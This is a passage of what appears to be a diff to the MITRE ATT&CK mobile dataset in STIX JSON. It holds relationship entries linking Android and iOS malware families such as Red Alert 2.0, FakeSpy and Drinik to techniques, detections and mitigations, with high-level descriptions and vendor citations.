"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ca9e5e50-49e9-44cc-a0a4-4ec8633a9506", + "type": "relationship", + "created": "2020-11-20T16:37:28.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": 
"https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.567Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) has encrypted exfiltrated data using AES in ECB mode.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--45da5ed9-3a9b-4491-98cb-96db68e245bb", + "created": "2020-12-14T14:52:03.184Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has used malicious overlays to collect banking credentials.(Citation: Sophos Red Alert 2.0)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f3e902fe-7eea-4b85-9067-25d29fd01dc5", + "created": "2023-03-20T15:21:12.492Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:21:12.492Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--322d0123-ea4c-4562-a718-672952c83d05", + "created": "2023-03-20T18:55:54.372Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:54.372Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--b7c0e45f-0206-4f75-96e7-fe7edad3aaff", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bcc8eb7a-d2a8-41d2-832e-f435e51c685a", + "created": "2022-03-30T19:54:43.835Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain fixes for vulnerabilities that could be leveraged to modify protected operating system files. ", + "modified": "2022-03-30T19:54:43.835Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--544e8fc3-c656-4081-9b4f-8a5d60926f47", + "created": "2022-04-01T17:08:41.293Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "If devices are enrolled using Apple User Enrollment or using a profile owner enrollment mode for Android, device controls prevent the enterprise from accessing the device’s physical location. This is typically used for a Bring Your Own Device (BYOD) deployment. 
", + "modified": "2022-04-01T17:08:41.293Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--db3fc82d-d353-438d-aa5e-9b5e7e60f0ac", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.748Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) checks if the device is on Wi-Fi, a cellular network, and is roaming.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b7a31a11-6c84-4c28-a548-4751e4d71134", + "created": "2020-05-04T14:04:56.158Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. 
(2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) can perform SMS fraud on older versions of the malware, and toll fraud on newer versions.(Citation: Google Bread)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d5928f73-c4ba-4eb1-bf8a-e75ff6806a4a", + "type": "relationship", + "created": "2020-11-10T17:08:35.713Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-11-10T17:08:35.713Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can collect notes and data from the MiCode app.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d63de13b-0253-42f4-b13d-34bccf76ad94", + "created": "2023-03-20T18:54:50.323Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:50.323Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--628435f7-7d1e-40f1-a29a-7c5861b14c7d", + "created": "2022-03-30T20:13:40.625Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be shown what a synthetic activity looks like so they can scrutinize them in the future.", + "modified": "2022-03-30T20:13:40.625Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", 
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4ff9b16f-3643-4fa0-b107-f93a9bb847c3", + "created": "2023-02-28T21:44:45.063Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:26:33.166Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can use overlays to cover legitimate applications or screens.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b263e4e9-972d-4ba7-8be8-e55eb6a483c0", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ArsTechnica-HummingWhale", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/", + "description": "Dan Goodin. (2017, January 23). 
Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) generates revenue by displaying fraudulent ads and automatically installing apps. When victims try to close the ads, [HummingWhale](https://attack.mitre.org/software/S0321) runs in a virtual machine, creating a fake ID that allows the perpetrators to generate revenue.(Citation: ArsTechnica-HummingWhale)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a7cc0168-247d-4a6d-b6f4-d5a04f99216c", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b928b94a-4966-4e2a-9e61-36505b896ebc", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5a6df1dd-9aa4-4f67-9195-8c3a9f5c0f7a", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Tripwire-MazarBOT", + "url": 
"https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) can send messages to premium-rate numbers.(Citation: Tripwire-MazarBOT)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--20dcd886-56c4-421d-ba36-0f37a47a3f86", + "created": "2022-04-06T13:55:37.498Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised that applications generally do not require permission to send SMS messages.", + "modified": "2022-04-06T13:55:37.498Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5a036fb8-9f72-4383-91c5-0f47b33b2c9d", + "created": "2019-07-10T15:35:43.658Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + 
"description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:57:40.371Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) gathers and exfiltrates data about nearby Wi-Fi access points.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--433ba5b0-76eb-49e1-a2ed-e54994e94041", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.174Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather cellular IDs.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--15d83ba8-be89-4151-9c6e-35d14df4fa80", + "created": "2022-03-30T19:33:05.375Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates typically provide patches for vulnerabilities that enable device rooting.", + "modified": "2022-03-30T19:33:05.375Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7850d933-120b-4ae6-998d-8dc4dfd6d164", + "type": "relationship", + "created": "2020-01-27T17:49:05.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:49:05.664Z", + "description": "(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "target_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0ae94053-1963-45ba-a3a9-62e508281c8e", + "created": "2023-01-19T18:06:36.986Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. 
Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:21:58.318Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can install malicious configurations on iPhones to allow malware to be installed via Ad Hoc distribution.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7696b512-ba2f-4310-86e1-7c528529fc5e", + "type": "relationship", + "created": "2020-09-15T15:18:12.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.425Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) stores its malicious code in encrypted asset files that are decrypted at runtime. 
Newer versions of [FakeSpy](https://attack.mitre.org/software/S0509) encrypt the C2 address.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5107be8a-b5fc-4442-af0d-2c92e086a912", + "type": "relationship", + "created": "2020-05-11T16:13:43.062Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-05-11T16:13:43.062Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) checks if a targeted application is running in user-space prior to infection.(Citation: CheckPoint Agent Smith) ", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--18afa4ad-4fd7-47ad-acdb-3b298b640d3c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. 
Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:05.199Z", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is auto-rooting adware that embeds itself as a system application, making it nearly impossible to remove.(Citation: Lookout-Adware)", + "relationship_type": "uses", + "source_ref": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6b74d347-4d28-401f-9ac2-b3e1c9428bab", + "created": "2023-01-18T19:16:15.534Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:54:10.458Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can use keylogging to steal user banking credentials.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4e6b726d-9ef4-4eb6-b9a7-74059caee5b7", + "created": "2020-07-20T13:27:33.440Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . 
Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:26:22.984Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect SMS messages.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eb052029-e1c9-4f24-8594-299aaec7f1df", + "created": "2020-12-14T14:52:03.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. 
Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:42:46.952Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can collect the device’s call log.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--67aa692c-24e4-483e-996e-02ce1e861ec8", + "created": "2023-02-28T20:37:29.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista 